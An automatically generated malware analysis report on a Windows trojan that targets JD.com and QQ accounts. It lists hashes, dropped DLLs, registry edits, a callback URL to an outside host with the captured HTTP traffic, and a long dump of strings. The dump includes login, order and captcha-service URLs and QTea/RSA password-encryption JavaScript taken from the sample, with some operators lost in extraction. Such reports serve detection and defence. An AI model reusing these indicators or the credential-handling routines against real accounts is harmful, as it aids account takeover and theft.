Trojan.Win32.FlyStudio_e7cb31ba24

by malwarelabrobot on February 11th, 2018 in Malware Descriptions.

HEUR:HackTool.Win32.Generic (Kaspersky), Packed-LF!E7CB31BA2402 (McAfee), PUA.NoobyProtect (Ikarus), Win32:Evo-gen [Susp] (AVG), Win32:Evo-gen [Susp] (Avast), Trojan-Downloader.Win32.Karagany.1.FD, Trojan-PSW.Win32.Bzub.2.FD, Trojan-PSW.Win32.MSNPassword.FD, Trojan.Win32.FlyStudio.FD, Trojan.Win32.Swrort.3.FD, GenericEmailWorm.YR, GenericInjector.YR, TrojanFlyStudio.YR, BankerGeneric.YR (Lavasoft MAS)
Behaviour: Trojan-Downloader, Trojan-PSW, Banker, Trojan, Worm, EmailWorm, HackTool, Packed


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: e7cb31ba2402a64c182413b93283d002
SHA1: 1f3b58512a410e2448bb8001122b64efbbe34645
SHA256: ee6be54f385c143e0b06cfffb62576d98adc25d5938880dd5e9e2fba4cda648b
SSDeep: 196608:obIkLkuyUiuSjT6RwPzm925fwO07TuSG84qA:o5LMU3RAzecwO0HuN84h
Size: 6377472 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6, ACProtect141
Company: no certificate found
Created at: 2016-07-21 14:25:49
Analyzed on: Windows7 SP1 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

Behaviour Description
EmailWorm Worm can send e-mails.


Process activity

The Trojan creates the following process(es):
No processes have been created.
The Trojan injects its code into the following process(es):

%original file name%.exe:2060

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process %original file name%.exe:2060 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\kss.ini (160 bytes)
C:\woniu.dll (61 bytes)
C:\systemvc.dll (47 bytes)
C:\yundamaAPI.dll (392 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\io[1].htm (15313 bytes)
C:\dc.dll (122 bytes)
C:\CrackCaptchaAPI.dll (1 bytes)
C:\MiMidama.dll (223 bytes)
C:\MayiAPI.dll (1 bytes)

Registry activity

The process %original file name%.exe:2060 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\e7cb31ba2402a64c182413b93283d002_RASMANCS]
"MaxFileSize" = "1048576"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\e7cb31ba2402a64c182413b93283d002_RASMANCS]
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\e7cb31ba2402a64c182413b93283d002_RASAPI32]
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\e7cb31ba2402a64c182413b93283d002_RASMANCS]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\e7cb31ba2402a64c182413b93283d002_RASAPI32]
"EnableConsoleTracing" = "0"
"MaxFileSize" = "1048576"
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\e7cb31ba2402a64c182413b93283d002_RASMANCS]
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\e7cb31ba2402a64c182413b93283d002_RASAPI32]
"FileTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3D 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Tracing\e7cb31ba2402a64c182413b93283d002_RASAPI32]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\e7cb31ba2402a64c182413b93283d002_RASMANCS]
"ConsoleTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Multimedia\DrawDib]
"vga.drv 1276x846x32(BGR 0)" = "31,31,31,31"

[HKLM\SOFTWARE\Microsoft\Tracing\e7cb31ba2402a64c182413b93283d002_RASMANCS]
"FileTracingMask" = "4294901760"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"AutoConfigURL"

Dropped PE files

MD5 File path
29ff953afe3790cf0b67b8d7d7359dc4 c:\CrackCaptchaAPI.dll
eba57ffa90628c7fcd12096cc082a659 c:\MayiAPI.dll
2db2810b0905089a6c18956cf81d9c1a c:\MiMidama.dll
f803ad370a8649a143429f179af5f3ab c:\dc.dll
8fea41d07b5ffbb7f8ed5cab7594698f c:\systemvc.dll
9af719d4a2b40c18326708a175db7ded c:\woniu.dll
87b52c5b4fa5fe617773896351a5deb4 c:\yundamaAPI.dll

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

Company Name:
Product Name: ?????
Product Version: 1.0.0.0
Legal Copyright: ?????? ????????
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 1.0.0.0
File Description: ?????
Comments: ??????????(http://www.dywt.com.cn)
Language: Language Neutral

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 16822272 5177344 5.5451 6239befd31ba01af763398c6d850e998
.sedata 16826368 1105920 1105920 5.11647 aa1761b510e4c9fce5534dda9405206f
.idata 17932288 4096 4096 1.30193 fe49dfa0864ced0bb6d7357f38d5ba62
.rsrc 17936384 73728 73728 1.08588 419be120ba3a7ab21185bcf5f1abdb3e
.sedata 18010112 4096 4096 5.53319 25405296ba989deffe0bb9b05974435f

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://www.jdhuoniu.com/kss_api/io.php?a=uplog&apiver=905&c=0&gdata=1&softcode=1000001&&lgid=0&f=&x=601315075180 120.25.160.139


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

Traffic

GET /kss_api/io.php?a=uplog&apiver=905&c=0&gdata=1&softcode=1000001&&lgid=0&f=&x=601315075180 HTTP/1.1
Accept: */*
Accept-Language: en-us
User-Agent: Mozilla/4.0  (compatible; MSiE 6.0; Windows NT 5.1;)
Accept-Encoding: gzip, deflate
Host: VVV.jdhuoniu.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Sat, 10 Feb 2018 07:51:28 GMT
Server: Apache
Set-Cookie: yunsuo_session_verify=bd186d3e1f1b4ab191b08b55c40dffd4;  path=/;
X-Powered-By: PHP/5.3.29
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 13623
Connection: close
Content-Type: text/html;charset=utf-8
...........}ko.G...._A$.b.pl.z.t<.M.Y..............-%V.f...d..)..l.
...-..%?...!.....v7.i...S..Y..W7.uvqw.3r....SU.]...u........^H.SI.?...
\8........./.....d.\..\.?~...9....g.........3..G.L:q../...3./>a....
.3./.d.....L.tK..c....g>.........6............*...zy..{..{.y.W.nZ..
._.L.......z..Uz..."...]'.;.k.L..z`?..'..ow.5...9{n...[.KN...........z
c...~...3..),cS...F.v.~...^~[/...K...YGc.n....w`....i.......-...xO"..s
.^Xm...S......Z..l.....> _........2........[..q....ns.Fj..9o...#{..
.].WJW...........&W.Os....s...._...?.z..D. ........U..Jk...|.:<..O.
.......V>g..F...*.N"~..$..............$=!.......&*..Eg... . ..U..8s
....!=.$............. E...Y.W......bg7.'...GV..CM.'..0.........s..D.9V
..F~...1p.....W.Gg..\.... ........Y@...i.`..d..o.6.s..|...}g....'.....
...F..Os.~.I......1...i.W..j..&......gj?a?...W....`...W.....y....9A...
F.{.4..;..m.}N.".<..q)../.Tk....M...T..g.....O.:4.s.....`.......*.|
..l. ..X...r.%0V.b,.^.....w.......w,.,iHTB.FG..........X..p...........
]...;...G..*!....{..v...O.4...k..E...!T........c.r...X...n.b?..v_J.c..
.e<.....c.....3....4=...lm..9{..S...L|....3s.....bco.QyU...A.....U.
.}..:h!.I.%\..k.....%.....U......#?..(...{.,)......Bm.$..jf.H...C#B...
..oH...!..T.%@.... >7....t....x..2..K.....Xm..._..,..q..bS.`..:9...
9 ..p..p....W%@<..H.....flu..Mt....=.6......O.B[".P..@.... .G^.#:..
7.8.cg.e.%..j...#...(".("..#.5...S]$....;.^[....|..B..9..8........ ...
`<.G.pDkc..$*./du...RD>.t.g...v..1.vk..cw.Z....I.....i.N...#..u.
.....R.d..My.z...!...@2.J.....3GC.Ju.|.R;.$0.)....Q.....6.I.(.x...
<<< skipped >>>

The Trojan connects to the servers at the folowing location(s):

%original file name%.exe_2060:

.text
`.sedata
h.idata
H.rsrc
@.sedata
t%SVh
t$(SSh
H%D?6
u.hTi6
~%UVW
u$SShe
K(.wS
kernel32.dll
ole32.dll
shlwapi.dll
ntdll.dll
CrackCaptchaAPI.dll
MayiAPI.dll
yundamaAPI.dll
FastVerCode.dll
dc.dll
woniu.dll
MiMidama.dll
systemvc.dll
gdiplus.dll
Ole32.dll
user32.dll
UUWiseHelper.dll
Mimidama.dll
wininet.dll
ShellExecuteA
MsgWaitForMultipleObjects
GetProcessHeap
ReportResult
YDM_Report
uu_reportError
ReportError
ReportError_A
reportError
GdiplusShutdown
Login2
uu_loginA
YDM_Login
HttpOpenRequestA
HttpSendRequestA
HttpQueryInfoA
{B6F7542F-B8FE-46a8-9605-98856A687097}
42305932-06E6-47a5-AC79-8BDCDC58DF61
WebBrowser
password
hXXp://VVV.zolpay.com/links/7931AAEAF687F1CC
1970-01-01 08:00:00
hXXp://api.m.taobao.com/rest/api.do?api=mtop.common.getTimestamp
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
WinHttp.WinHttpRequest.5.1
\config.ini
_applogin_=
hXXp://m.z.jd.com/inc_focus.action?key=1000&systemId=
.html
hXXp://m.z.jd.com/project/details/
focusCounter.focus
focusCounter.praise
hXXp://m.z.jd.com/inc_praise.action?key=1000&systemId=
hXXp://zt.m.jd.com/funding/support_project.action?projectId=
;psq/11;ref/;pap/JA2015_311210|4.4.3|ANDROID;usc/;usp/;umd/;utr/;adk/;ads/;Mozilla/5.0 (Linux; Android 5.1.1; A0001 Build/LMY47V; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/43.0.2357.121 Mobile Safari/537.36
;network/wifi;osp/android;apv/4.4.3;osv/5.1.1;uid/
jdapp;android;4.4.3;5.1.1;
com.jingdong.app.mall
data-value="(.*?)".*?data-key="(.*?)"
hXXp://payrisk.jd.com/m.html
hXXp://zt.m.jd.com/funding/m_list_address.action?projectId=
hXXp://zt.m.jd.com/funding/m_project_subscribe.action
application/x-www-form-urlencoded
;network/4g;Mozilla/5.0 (Linux; U; Android 4.3; zh-cn; A0001 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
jdapp;android;4.2.1;4.3;
UPDATE JDorder SET payURL='
wskey=
hXXps://wlogin.m.jd.com/applogin_v2
Android WJLoginSDK
wrong password
^[0-9]{1,}$
1.3.3
hXXp://safe.jd.com/user/paymentpassword/getUserSafeInfo.action?callback=jsonp1437220564810&_=
hXXp://order.jd.com/center/list.action
XMLHttpRequest
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
NotLogin
hXXp://home.jd.com/2014/data/account/profile.action?t=
hXXp://home.jd.com/
5.1.0
&clientVersion=5.1.0&build=31030&client=android&d_brand=ONEPLUS&d_model=A0001&osVersion=4.3&screen=1920*1080&partner=baidu&area=&networkType=wifi&sign=
hXXp://api.m.jd.com/client.action?functionId=newUserAllOrderList&uuid=
Dalvik/1.6.0 (Linux; U; Android 4.3; A0001 Build/JLS36C)
hXXp://wq.jd.com/bases/orderlist/deallist?order_type=1&callback=waitPay&t=
hXXp://wqs.jd.com/order/orderlist_merge.shtml?tab=1
Mozilla/5.0 (Linux; U; Android 4.3; zh-cn; A0001 Build/JLS36C) AppleWebKit/533.1 (KHTML, like Gecko)Version/4.0 MQQBrowser/5.4 TBS/025413 Mobile Safari/533.1 V1_AND_SQ_5.6.0_244_YYB_D QQ/5.6.1.2455 NetType/WIFI WebP/0.3.0
hXXp://home.m.jd.com/myJd/home.action?sid=
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0
String.prototype.getBytes = function () {
for (var i = 0; i < this.length; i  ) {
var charCode = this.charCodeAt(i);
var cLen = Math.ceil(Math.log(charCode) / Math.log(256));
bytes.push((charCode << (j * 8)) & 0xFF);
for (var result = "", i = 0; i < a.length;   i) {
result  = (String.fromCharCode(a[i]));
for (var bytes = [], c = 0; c < hex.length; c  = 2)
bytes.push(parseInt(hex.substr(c, 2), 16));
for (var hex = [], i = 0; i < bytes.length; i  ) {
hex.push((bytes[i] >>> 4).toString(16));
hex.push((bytes[i] & 0xF).toString(16));
return hex.join("");
var r = ("000000000"   b.toString(2));
for (var bits = [], c = r.length -8; c < r.length; c  ) {
bits.push(parseInt(r.substr(c, 1), 10))
for (var bits = [], c = 0; c < bytes.length; c  ) {
bits.push.apply(bits, byteToBin(bytes[c]))
var r1 = r1.join('');
for (var bytes = [], c = 0; c < r1.length; c  = 8) {
bytes.push(parseInt(r1.substr(c, 8), 2));
var key_256 = hexToBytes("35e4a6df9c309a87edbd845dc2e751701f7bb72090b986716{sign_key}3961561a010b4d6eb91fdac0e3bbe68c126f854f9ba129863ef426b254f593abce81e49d3078905a31aa1029bb288ff017fb06e7eabc60074467c5fe22d2e0c818a721183cde956ce75ca7d9e522c536fa43cdc0bd8aa2af2e33769feec78ea3879b8f6c9a7b697bb5e278cda3e8fd4d0484793e0036cdd6a24b5d25c6d1c8e2f45c8c377c00432e5c75044e68028a5fcd1d7f3b3de0f67cf4a08a9f5bfccf77617574b33211bb11929d50631d99455404139f118ee1d82604d22620a955b3d3f9d4e145834c45a99e10913ae8b73237a36adfbfa2b{sign_key}db0d9fa81692a285c565f08d4ccbf4af");
var key_8 = hexToBytes("51f34cd789ab206e");
var hash_len = Math.floor(r.length / 8) * 8;
r[i] ^= key_256[i % 256];
r[i] = ((((iv_8[v5] << (8 - v5)) | (iv_8[v5] >> v5)) ^ r[i]) & ~key_8[v5] | key_8[v5] & ~((((iv_8[v5] << (8 - v5)) | (iv_8[v5] >> v5)) ^ r[i]) & 0xFF & key_8[v5])) & 0xFF
var process_len = r.length - hash_len;
r2 = fix_1(r.slice(hash_len));
r2 = fix_2(r.slice(hash_len));
r2 = fix_3(r.slice(hash_len));
r2 = fix_4(r.slice(hash_len));
r2 = fix_5(r.slice(hash_len));
r2 = fix_6(r.slice(hash_len));
r2 = fix_7(r.slice(hash_len));
var r3 = r.slice(0, hash_len)
r3.push.apply(r3, r2);
{sign_key}
for(var i = 0, len = str.length; i < len;   i)
hash  = (hash << 5)   str.charAt(i).charCodeAt();
4.4.2
4.4.5
1920*1080
000000010005
001200280020
00000000
TEAKEY
\Mimidama.dll
\MiMidama.dll
`.rdata
@.data
.rsrc
@.reloc
SSSSh
$SShh
ByScreen.JPG
c:\i.ini
operator
GetProcessWindowStation
E:\work\mimi
\Mimidama.pdb
KERNEL32.dll
USER32.dll
GDI32.dll
RegCloseKey
RegOpenKeyExW
ADVAPI32.dll
SHELL32.dll
OLEAUT32.dll
SHLWAPI.dll
URLDownloadToFileW
urlmon.dll
dbghelp.dll
IPHLPAPI.DLL
GetCPInfo
Mimidama.DLL
Login
RecUrl
uu_loginW
uu_recognizeByCodeTypeAndUrlA
uu_recognizeByCodeTypeAndUrlW
<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
6064686<6
7(8,80848
6o6
9!9&959?9
6$6(6,6064686<6@6
7(7/74787<7]7
7&8,8084888
; ;$;(;0;
hXXp://api.ruokuai.com/register.xml
hXXp://api.ruokuai.com/info.xml
hXXp://api.ruokuai.com/recharge.xml
hXXp://api.ruokuai.com/create.xml
hXXp://api.ruokuai.com/reporterror.xml
8CB52174-D9F4-4B8D-AC9B-E6EFEE79FEEA
32F1C86B-E64C-4EAF-8BC1-C142570008BC
SESSIONkEY
-12027,TEAKEY
key hash
hXXp://check.ptlogin2.qq.com/check?pt_tea=1&uin=
Mozilla/5.0 (Linux; U; Android 4.2.2; zh-cn; H30-U10 Build/HuaweiH30-U10) AppleWebKit/533.1 (KHTML, like Gecko)Version/4.0 MQQBrowser/5.7 Mobile Safari/533.1 V1_AND_SQ_5.4.0_218_YYB_D QQ/5.4.1.2390 NetType/3G
hXXp://captcha.qq.com/cap_union_show?captype=3&lang=2052&aid=716027609&uin=
hXXp://captcha.qq.com/getimgbysig?aid=716027609&uin=
&0.6598044210113585
hXXp://captcha.qq.com/cap_union_verify?aid=716027609&uin=
var p = encrypt.Encryption.getEncryption(p, u, code);
encrypt.RSA = function() {
while (z   aC < aB.length) {
t  = aB.substring(z, z   aC)   "\n";
return t   aB.substring(z, aB.length)
return "0"   t.toString(16)
return t.toString(16)
if (aF < aC.length   11) {
var aB = aC.length - 1;
var aD = aC.charCodeAt(aB--);
z.nextBytes(t)
this.dmp1 = null;
this.dmq1 = null;
this.coeff = null
if (z != null && t != null && z.length > 0 && t.length > 0) {
uv_alert("Invalid RSA public key")
return t.modPowInt(this.e, this.n)
var t = ag(aB, (this.n.bitLength()   7) >> 3);
var aC = this.doPublic(t);
var z = aC.toString(16);
if ((z.length & 1) == 0) {
M.prototype.doPublic = X;
M.prototype.setPublic = p;
M.prototype.encrypt = q;
this.fromNumber(z, t, aB)
this.fromString(z, 256)
this.fromString(z, t)
aF = Math.floor(aB / 67108864);
if (aa && (navigator.appName == "Microsoft Internet Explorer")) {
at.prototype.am = az;
if (aa && (navigator.appName != "Netscape")) {
at.prototype.am = b;
at.prototype.am = ay;
at.prototype.DB = ax;
at.prototype.DM = ((1 << ax) - 1);
at.prototype.DV = (1 << ax);
at.prototype.FV = Math.pow(2, ab);
at.prototype.F1 = ab - ax;
at.prototype.F2 = 2 * ax - ab;
aq = "0".charCodeAt(0);
aq = "a".charCodeAt(0);
aq = "A".charCodeAt(0);
return af.charAt(t)
var aB = ah[z.charCodeAt(t)];
z.fromInt(t);
this.fromRadix(aF, z);
var aE = aF.length,
if (aF.charAt(aE) == "-") {
if (aD   aC > this.DB) {
this[this.t - 1] |= (t & ((1 << (this.DB - aD)) - 1)) << aD;
this[this.t  ] = (t >> (this.DB - aD))
if (aD >= this.DB) {
aD -= this.DB
this[this.t - 1] |= ((1 << (this.DB - aD)) - 1) << aD
this.clamp();
at.ZERO.subTo(this, this)
var t = this.s & this.DM;
return "-"   this.negate().toString(z)
return this.toRadix(z)
var aF = this.DB - (aC * this.DB) % aB;
if (aF < this.DB && (aG = this[aC] >> aF) > 0) {
aG |= this[--aC] >> (aF  = this.DB - aB)
aF  = this.DB; --aC
at.ZERO.subTo(this, t);
return (this.s < 0) ? this.negate() : this
return this.DB * (this.t - 1)   k(this[this.t - 1] ^ (this.s & this.DM))
z.t = Math.max(this.t - aB, 0);
var z = aG % this.DB;
var t = this.DB - z;
var aD = Math.floor(aG / this.DB),
aF = (this.s << z) & this.DM,
aC.clamp()
var aD = Math.floor(aF / this.DB);
var z = aF % this.DB;
t = Math.min(z.t, this.t);
aC[aB  ] = aD & this.DM;
aD >>= this.DB
aC[aB  ] = aD & this.DM;
aD >>= this.DB
aC[aB  ] = this.DV   aD
var t = this.abs(),
aD = z.abs();
aC[aB   t.t] = t.am(0, aD[aB], aC, aB, 0, t.t)
aC.clamp();
at.ZERO.subTo(aC, aC)
var t = this.abs();
var aC = t.am(z, t[z], aB, 2 * z, 0, 1);
if ((aB[z   t.t]  = t.am(z   1, 2 * t[z], aB, 2 * z   1, aC, t.t - z - 1)) >= t.DV) {
aB[z   t.t] -= t.DV;
aB[aB.t - 1]  = t.am(z, t[z], aB, 2 * z, 0, 1)
aB.clamp()
var aP = aJ.abs();
var aH = this.abs();
aG.fromInt(0)
this.copyTo(aF)
var aO = this.DB - k(aP[aP.t - 1]);
aP.lShiftTo(aO, aD);
aH.lShiftTo(aO, aF)
aP.copyTo(aD);
aH.copyTo(aF)
var aS = this.FV / aK,
aD.dlShiftTo(aM, aE);
if (aF.compareTo(aE) >= 0) {
aF.subTo(aE, aF)
at.ONE.dlShiftTo(aL, aE);
aE.subTo(aD, aD);
var aC = (aF[--aN] == aB) ? this.DM: Math.floor(aF[aN] * aS   (aF[aN - 1]   aQ) * aR);
if ((aF[aN]  = aD.am(0, aC, aF, aM, 0, aL)) < aC) {
aD.dlShiftTo(aM, aE);
aF.subTo(aE, aF);
aF.subTo(aE, aF)
aF.drShiftTo(aL, aG);
at.ZERO.subTo(aG, aG)
aF.clamp();
aF.rShiftTo(aO, aF)
at.ZERO.subTo(aF, aF)
this.abs().divRemTo(t, null, z);
if (this.s < 0 && z.compareTo(at.ZERO) > 0) {
t.subTo(z, z)
if (t.s < 0 || t.compareTo(this.m) >= 0) {
return t.mod(this.m)
t.divRemTo(this.m, null, t)
t.multiplyTo(aB, z);
this.reduce(z)
t.squareTo(z);
L.prototype.convert = W;
L.prototype.revert = al;
L.prototype.reduce = K;
L.prototype.mulTo = I;
L.prototype.sqrTo = av;
z = (z * (2 - t * z % this.DV)) % this.DV;
return (z > 0) ? this.DV - z: -z
this.mp = t.invDigit();
this.mpl = this.mp & 32767;
this.mph = this.mp >> 15;
this.um = (1 << (t.DB - 15)) - 1;
this.mt2 = 2 * t.t
t.abs().dlShiftTo(this.m.t, z);
z.divRemTo(this.m, null, z);
if (t.s < 0 && z.compareTo(at.ZERO) > 0) {
this.m.subTo(z, z)
t.copyTo(z);
this.reduce(z);
while (t.t <= this.mt2) {
var aC = (z * this.mpl   (((z * this.mph   (t[aB] >> 15) * this.mpl) & this.um) << 15)) & t.DM;
t[z]  = this.m.am(0, aC, t, aB, 0, this.m.t);
while (t[z] >= t.DV) {
t[z] -= t.DV;
t.clamp();
t.drShiftTo(this.m.t, t);
if (t.compareTo(this.m) >= 0) {
t.subTo(this.m, t)
f.prototype.convert = ak;
f.prototype.revert = au;
f.prototype.reduce = Q;
f.prototype.mulTo = A;
f.prototype.sqrTo = an;
return at.ONE
aE = aH.convert(this),
aE.copyTo(aF);
aH.sqrTo(aF, aB);
aH.mulTo(aB, aE, aF)
return aH.revert(aF)
if (aB < 256 || t.isEven()) {
return this.exp(aB, aC)
at.prototype.copyTo = Z;
at.prototype.fromInt = o;
at.prototype.fromString = x;
at.prototype.clamp = P;
at.prototype.dlShiftTo = ar;
at.prototype.drShiftTo = Y;
at.prototype.lShiftTo = u;
at.prototype.rShiftTo = m;
at.prototype.subTo = ac;
at.prototype.multiplyTo = E;
at.prototype.squareTo = R;
at.prototype.divRemTo = F;
at.prototype.invDigit = C;
at.prototype.isEven = j;
at.prototype.exp = y;
at.prototype.toString = r;
at.prototype.negate = S;
at.prototype.abs = am;
at.prototype.compareTo = H;
at.prototype.bitLength = v;
at.prototype.mod = O;
at.prototype.modPowInt = ao;
at.ZERO = c(0);
at.ONE = c(1);
d(new Date().getTime())
if (navigator.appName == "Netscape" && navigator.appVersion < "5" && window.crypto && window.crypto.random) {
var G = window.crypto.random(32);
for (J = 0; J < G.length;   J) {
V[ad  ] = G.charCodeAt(J) & 255
J = Math.floor(65536 * Math.random());
n.init(V);
for (ad = 0; ad < V.length;   ad) {
return n.next()
for (t = 0; t < z.length;   t) {
ae.prototype.nextBytes = aw;
z = (z   this.S[aC]   aD[aC % aD.length]) & 255;
l.prototype.init = e;
l.prototype.next = a;
t.setPublic(aB, z);
return t.encrypt(aC)
return Math.round(Math.random() * 4294967295)
for (var A = 0; A < C.length; A  ) {
var B = Number(C[A]).toString(16);
if (B.length == 1) {
for (var z = 0; z < A.length; z  = 2) {
B  = String.fromCharCode(parseInt(A.substr(z, 2), 16))
for (var z = 0; z < B.length; z  ) {
A[z] = B.charCodeAt(z)
var z = B.length;
var z = D.length;
for (var B = 0; B < A.length; B  ) {
var z = t.length;
for (var A = 0; A < D.length; A  ) {
B[A] = D.charCodeAt(A) & 255
for (var A = 0; A < D.length; A  = 2) {
B[z  ] = parseInt(D.substr(A, 2), 16)
for (var A = 0; A < B.length; A  ) {
z  = String.fromCharCode(B[A])
return d.encode(z)
initkey: function(z, A) {
d.PADCHAR = "=";
d.ALPHA = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789 /";
d.getbyte = function(B, A) {
var z = B.charCodeAt(A);
d.encode = function(D) {
if (arguments.length != 1) {
var A = d.PADCHAR;
var F = d.ALPHA;
var E = d.getbyte;
var B = D.length - D.length % 3;
if (D.length == 0) {
z.push(F.charAt(G >> 18));
z.push(F.charAt((G >> 12) & 63));
z.push(F.charAt((G >> 6) & 63));
z.push(F.charAt(G & 63))
switch (D.length - B) {
z.push(F.charAt(G >> 18)   F.charAt((G >> 12) & 63)   A   A);
z.push(F.charAt(G >> 18)   F.charAt((G >> 12) & 63)   F.charAt((G >> 6) & 63)   A);
return z.join("")
encrypt.Encryption = function() {
return binl2hex(core_md5(str2binl(s), s.length * chrsz))
return binl2str(core_md5(str2binl(s), s.length * chrsz))
function hex_hmac_md5(key, data) {
return binl2hex(core_hmac_md5(key, data))
function b64_hmac_md5(key, data) {
return binl2b64(core_hmac_md5(key, data))
function str_hmac_md5(key, data) {
return binl2str(core_hmac_md5(key, data))
for (var i = 0; i < x.length; i  = 16) {
function core_hmac_md5(key, data) {
var bkey = str2binl(key);
if (bkey.length > 16) {
bkey = core_md5(bkey, key.length * chrsz)
ipad[i] = bkey[i] ^ 909522486;
opad[i] = bkey[i] ^ 1549556828
var hash = core_md5(ipad.concat(str2binl(data)), 512   data.length * chrsz);
return core_md5(opad.concat(hash), 512   128)
for (var i = 0; i < str.length * chrsz; i  = chrsz) {
bin[i >> 5] |= (str.charCodeAt(i / chrsz) & mask) << (i % 32)
for (var i = 0; i < bin.length * 32; i  = chrsz) {
str  = String.fromCharCode((bin[i >> 5] >>> (i % 32)) & mask)
for (var i = 0; i < binarray.length * 4; i  ) {
str  = hex_tab.charAt((binarray[i >> 2] >> ((i % 4) * 8   4)) & 15)   hex_tab.charAt((binarray[i >> 2] >> ((i % 4) * 8)) & 15)
for (var i = 0; i < binarray.length * 4; i  = 3) {
if (i * 8   j * 6 > binarray.length * 32) {
str  = tab.charAt((triplet >> 6 * (3 - j)) & 63)
for (var i = 0; i < str.length; i = i   2) {
arr.push("\\x"   str.substr(i, 2))
arr = arr.join("");
var hex = str.toString(16);
var len = hex.length;
arr.push("\\x"   hex.substr(j, 2))
var result = arr.join("");
function getEncryption(password, user, vcode) {
password = password || "";
var md5Pwd = md5(password),
rsaH1 = encrypt.RSA.rsa_encrypt(h1),
rsaH1Len = (rsaH1.length / 2).toString(16),
hexVcode = TEA.strToBytes(vcode.toUpperCase()),
vcodeLen = "000"   vcode.length.toString(16);
while (rsaH1Len.length < 4) {
TEA.initkey(s2);
var saltPwd = TEA.enAsBase64(rsaH1Len   rsaH1   TEA.strToBytes(salt)   vcodeLen   hexVcode);
TEA.initkey("");
return saltPwd.replace(/[\/\ =]/g,
"/": "-",
" ": "*",
"=": "_"
function getRSAEncryption(password, vcode) {
var str1 = md5(password);
var str2 = str1   vcode.toUpperCase();
var str3 = encrypt.RSA.rsa_encrypt(str2);
&pt_randsalt=0&ptlang=2052&low_login_enable=0&u1=http://connect.qq.com&from_ui=1&fp=loginerroralert&device=2&aid=716027609&pt_3rd_aid=100273020&ptredirect=1&h=1&g=1&pt_uistyle=35&pt_vcode_v1=
hXXp://ptlogin2.qq.com/pt_open_login?openlogin_data=which=&refer_cgi=authorize&response_type=code&client_id=100273020&state=&display=&openapi=1010_1011&switch=0&src=1&sdkv=&sdkp=a&tid=1425887074&pf=&need_pay=0&browser=0&browser_error=&serial=&token_key=&redirect_uri=http%3A%2F%2Fwei.jd.com%2Fparty%2Ftws64%2Fm%2Fh5v1%2FGetCode_login%3Frurl%3DaHR0cDovL3dxcy5qZC5jb20vbXkvbXlfYWRkcmVzcy5zaHRtbA%3D%3D%26check%3Dcb39618c8374cb92014bc14a8b5cc7c3%26state%3D00-1425886621-14756-495&sign=&time=&status_version=&status_os=&status_machine=&page_type=1&has_auth=1&update_auth=1&auth_time=1425887509548&verifycode=
hXXp://wq.jd.com/mcoss/wxmall/home?ptype=2&sid=&_wv=1&vaswebreport=1
37128.9.4
&shownav=1
hXXp://wq.jd.com/mlogin/h5v1/cpLogin_BJ?rurl=http://wqs.jd.com/my/index.shtml?PTAG=
image/jpeg, application/x-ms-application, image/gif, application/xaml xml, image/pjpeg, application/x-ms-xbap, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
4.0.0
1.1.0
http://h5.m.jd.com/active/member/html/index.html
